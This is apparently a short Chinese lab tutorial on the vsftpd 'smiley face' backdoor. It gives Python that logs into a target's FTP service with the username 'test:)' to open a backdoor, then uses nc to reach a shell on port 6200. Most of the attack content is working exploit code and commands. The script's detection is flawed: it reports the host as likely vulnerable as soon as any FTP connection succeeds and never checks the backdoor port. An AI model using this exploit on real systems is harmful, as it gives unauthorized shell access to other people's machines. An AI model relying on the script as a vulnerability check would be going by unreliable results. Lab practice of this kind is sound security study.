huarui bio photo

笑脸漏洞检测


经过查询得知python的socket库中包含网络探测所需要的函数,在代码前面导入该库



编写


先导入socket库以及FTP库


import socket
from ftplib import FTP


接下来获取输入指定目标ip


ip = input("检测ip:")


编写FTP连接部分

笑脸漏洞即账号名中带有:) 的时候,会打开一个开放在6200端口的后门,可以连接到靶机的shell


    ftp = FTP()
    user = "test:)"
    passwd = "123"
    ftp.connect(ip, 21, timeout=100)
    print("成功连接 很可能存在笑脸漏洞")
    response = ftp.login(user, passwd)
    ftp.quit()


全部代码如下:


import socket
from ftplib import FTP

ip = input("检测ip:")
smile_port = "6200"

try:
    ftp = FTP()
    user = "test:)"
    passwd = "123"
    ftp.connect(ip, 21, timeout=100)
    print("成功连接 很可能存在笑脸漏洞")
    response = ftp.login(user, passwd)
    ftp.quit()
except:
    print("连接失败,可能不存在笑脸漏洞")


实验



输入我的靶机ip



提示存在笑脸漏洞,使用命令 nc 靶机ip 端口

可以直接连接上对方的shell,利用成功